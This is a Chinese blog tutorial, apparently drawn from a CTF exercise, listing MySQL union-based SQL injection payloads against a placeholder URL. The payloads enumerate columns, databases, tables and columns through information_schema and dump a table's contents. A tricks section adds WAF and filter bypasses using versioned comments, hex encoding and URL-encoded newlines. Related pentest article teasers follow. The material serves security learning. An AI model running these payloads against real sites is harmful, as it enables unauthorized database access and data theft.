針對MySQL的sql注入

原創 hibari_18 2020-06-16 16:14

常用:
//order by和union select後接的數字個數如果和當前表的列數不同會報錯。故可通過以下語句對列數進行判定。

http://xxx.com/index.php?id=1 order by 3

執行結果

//判斷哪一列的數據可回顯,一般用在有回顯的情況,但大部分情況都是需要報錯注入或者時間盲注的。union前面用id=-1(不存在的值)可以把多餘的東西去掉。

http://xxx.com/index.php?id=-1 union select 1,2,3

//在可回顯的那一列用database()回顯數據庫名,也可以通過user()回顯用戶

http://xxx.com/index.php?id=-1 union select 1,database(),3

//回顯,庫名
sqli

//MySQL默認存在information_schema數據庫,通過該數據庫回顯表名,列名

http://xxx.com/index.php?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='sqli'

//回顯,表名
info

//注入info表的列名

http://xxx.com/index.php?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='info'

//列名
id,title,flAg_T5ZNdrm

//注入sqli.info

http://xxx.com/index.php?id=-1 union select 1,group_concat(id,title,flAg_T5ZNdrm),3 from sqli.info

//內容(flag打碼)
1flag{在數據庫中}flag{xxxxxxxxxxxxxxxxxxxxxxxx},2testtest

tricks:
1.&代替and,&&代替and,網頁中涉及url編碼用%26%26。
2.-1=-1代替1=1,True代替1=1,False代替1=2。
3.嘗試 <> /**/ 等符號繞過防禦函數,代替空格。
4.0xhex 在MySQL中會被轉義爲string型。

select * from test where id=0x7573657233;

在這裏插入圖片描述
5.mysql CHAR()+if(expr,1,0)

select * from test where id=CHAR(117, 115, 101, 114, 51+if(length(user/**/())=14,0,1));

在這裏插入圖片描述
6.如果當前數據庫版本高於/*!10044*/,則跟在後面的sql語句也會被執行。
/*!10044*/繞過union select:

/*!10044union*/ /*!10044select 1,2,3*/+
union /*!10044select 1,2,3*/+

%23QQQ%0Aunion%23QQQQ%0A繞過union select、database():

%23QQQ%0Aunion%23QQQQ%0Aselect 1,2,3+ 
%23QQQ%0Aunion%23QQQQ%0Aselect1,database/*!()*/,3+

/*!60000ghtwf01*/繞過order by、union select:

order/*!60000ghtwf01*/by
union/*!60000ghtwf01*/select

查詢數據庫名:

id=0' union/*!60000ghtwf01*//*!00000select*/ 1,2,schema_name from information_schema.schemata limit 0,1--+

查表名:

id=0' union/*!60000ghtwf01*//*!00000select*/ 1,2,table_name from information_schema.tables where table_schema=0x7365637572697479 limit 0,1--+

查詢列名:

id=0' union/*!60000ghtwf01*//*!00000select*/ 1,2,username from users limit 0,1--+
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

MSF基本命令及實例

目錄MSF基本架構RexMSF::CoreMSF::BasePlugin插件MSF數據庫恢復數據庫技術功能模塊(不是流程模塊)MSF基本使用和控制檯命令(MSFconsole)更新地位幫助命令MSF控制檯基本命令模塊內基本命令數據

Nero, 2020-07-08 03:17:43

常見web攻擊的加固方法

0x01 XSS 1.過濾特殊字符(XSS Filter) 過濾惡意標籤+屬性 (1)href僞協議 <a href=javascript:('/a/')>test</a> (2)HTML新增標籤 <math><maction

hibari_18 2020-07-07 23:58:29

3vilTwinAttacker AP僞裝工具

下載3vilTwinAttacker:    git clone https://github.com/P0cL4bs/3vilTwinAttacker.git    cd 3vilTwinAttacker chmod +x instal

鱼与羽 2020-07-07 11:32:53

Airolib 密碼分析提速-學習筆記

echo TP_Link722 > essid.txt#將AP的廣播名生成TXT airolib-ng db --import essid essid.txt#根據essid生成數據庫 airolib-ng db --stats#查看數據

鱼与羽 2020-07-07 11:32:52

AIREPLAY-NG的使用學習筆記

指令:aireplay-ng <options> <interface name> 例子:airplay-ng -9 wlan0mon #測試AP的注包通信質量 airplay-ng -9 wlan0mon -e TP-LINK_0450

鱼与羽 2020-07-07 11:32:52

Linux學習運維基礎網絡知識

運維基礎網絡知識 NA --- 網絡助手級別(6天) NP --- 網絡專業級別(4個部分 4天) IE --- 網絡專家級別 (2-3月) 運維基礎網絡知識概述 TCP協議概念知識 TCP十一種狀態集轉換 網絡重要協議原理 D

蔡建辉 2020-07-07 06:15:45

網站滲透實戰試驗(僅供參考)

首先收集必要的信息 發現存在php探針,phpinfo,phpmyadmin 常用的垃圾弱口令登錄失敗。 嘗試登錄後臺,網站使用帝國cms7.2系統 弱口令登錄失敗,使用網絡上帝國cms的通用漏洞,行不通失敗。 在知道絕對路徑的情

qq_2190630418 2020-07-05 04:49:30

滲透測試----簡介

滲透測試是一種通過模擬攻擊者的技術和方法,挫敗目標系統的安全控制措施並取得訪問控制權的安全測試方式。 一、PDES標準中的滲透測試階段 PDES標準中的滲透測試階段使用來定義滲透測試過程,並確保客戶組織能夠以一種標準化的方式來擴展

野九 2020-07-05 03:38:14

metasploit中msf框架以及更新

今天剛開始學習Metasploit時就遇到問題,經過反覆查找最終還是沒能搞定,在學長的指導下發現原來是我kali中metasplooit更新的問題。經查資料:自15年底的kali2.0版本開始,Kali團隊不再使用Rapid7 提

野九 2020-07-05 03:38:14

OGNL漏洞原理與解決方案

一,漏洞存在的地方和原理 Struts2的核心是使用的webwork框架,處理 action時通過調用底層的getter/setter方法來處理http的參數,它將每個http參數聲明爲一個ONGL(這裏是ONGL的介紹)語句。當我們提交

MoYanHanHuiLengMa 2020-07-05 02:22:57

secureCat掃描nginx

一. ngnix用途 1. Web 服務器: 相比 Apache,Nginx 使用更少的資源,支持更多的併發連接,體現更高的效率,這點使 Nginx 尤其受到虛擬主機提供商的歡迎。能夠支持高達 50,000 個併發連接數的響應,感謝 Ng

MoYanHanHuiLengMa 2020-07-05 02:22:56

滲透測試題

1. mongodb,redis的默認端口; *默認端口 27017 ,6379 redis安全配置項 1.在配置文件中設置監聽ip:bind 127.0.0.1 1.1.1.1 (多個IP用空格分開) 2.更改默認端口6379 3.設置

MoYanHanHuiLengMa 2020-07-05 02:22:56

pikachu靶場 :六、文件包含漏洞

pikachu靶場 :六、文件包含漏洞 概述本地文件包含漏洞遠程文件包含漏洞 概述 文件包含,是一個功能。 在各種開發語言中都提供了內置的文件包含函數,其可以使開發人員在一個代碼文件中直接包含(引入)另外一個代碼文件。 比如 在P

CN_wanku 2020-07-01 17:44:04

[滲透測試][Kali]對DC-2靶機進行滲透測試

對DC-2靶機進行滲透測試 1.搭建滲透平臺 2.準備工作 3.掃描端口 4.使用wpscan進一步掃描 5.破解密碼 6.登陸ssh 7.root權限提升 1.搭建滲透平臺 Kali 2018, DC-2靶機, VMWare虛

Bob Xiao 2020-06-30 01:15:22

[滲透測試][Kali]對DC-1靶機進行滲透測試

對DC-1靶機進行滲透測試 1.搭建滲透平臺 Kali 2018, DC-1靶機, VMWare虛擬機平臺 2.準備工作 使用nmap發現局域網中的主機 shell命令 nmap -sn 192.168.12.0/24 she

Bob Xiao 2020-06-30 01:15:22